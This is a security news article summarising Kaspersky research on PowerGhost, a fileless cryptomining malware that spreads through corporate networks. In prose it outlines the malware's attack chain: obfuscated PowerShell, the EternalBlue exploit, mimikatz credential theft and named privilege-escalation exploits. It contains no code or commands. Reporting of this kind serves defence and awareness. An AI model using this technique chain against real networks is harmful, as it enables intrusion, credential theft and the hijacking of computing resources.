PowerGhost: New fileless cryptomining malware targets corporate networks worldwide

• PowerGhost uses PowerShell script and the EternalBlue exploit to spread across infected networks.
• Cryptocurrency-mining malware has surpassed ransomware in recent months as cybercriminals shift towards cryptomining campaigns to make money,

Security researchers have discovered a new fileless, cryptocurrency-mining malware that has been targeting large corporate networks across the globe, infecting both business PCs and servers. According to Kaspersky Lab researchers, the stealthy malware dubbed PowerGhost features a combination of PowerShell script and the notorious EternalBlue exploit to spread across infected networks.

EternalBlue is a hacking tool developed by the US National Security Agency that was infamously leaked by the hacker group Shadow Brokers in April 2017 and has since been used by cybercriminals to power several malicious campaigns including the WannaCry and NotPetya attacks.

Modus Operandi

The malware itself is an obfuscated PowerShell script that contains the core code and several add-on modules including one for reflective portable executable injection, a shellcode for the EternalBlue exploit, the miner and several other modules for the miner's operation such as mimikatz.

"The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies," Kaspersky Lab researchers wrote in a blog post. "The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive."

Since the script isn't stored on the infected machine's hard drive, it makes it PowerGhost harder to detect and thwart.

Once the machine is infected with PowerGhost, it leverages the EternalBlue exploit to spread across the local network and uses mimikatz to harvest credentials and allow for the escalation of privileges with 32-bit or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120. It then uses reflective PE injection to load a PE file and launch the miner to generate cryptocurrency.

So far, PowerGhost has primarily targeted corporate networks in India, Brazil, Columbia and Turkey.

Researchers also noted that one version of PowerGhost could also be used to conduct DDoS attacks, likely to earn its authors extra money by offering DDoS services as well.

Shift from ransomware to cryptomining malware

Cryptocurrency-mining malware has surpassed ransomware of late as cybercriminals increasingly shift towards cryptomining campaigns to make money off of victims.

"The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system," researchers said. "It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans."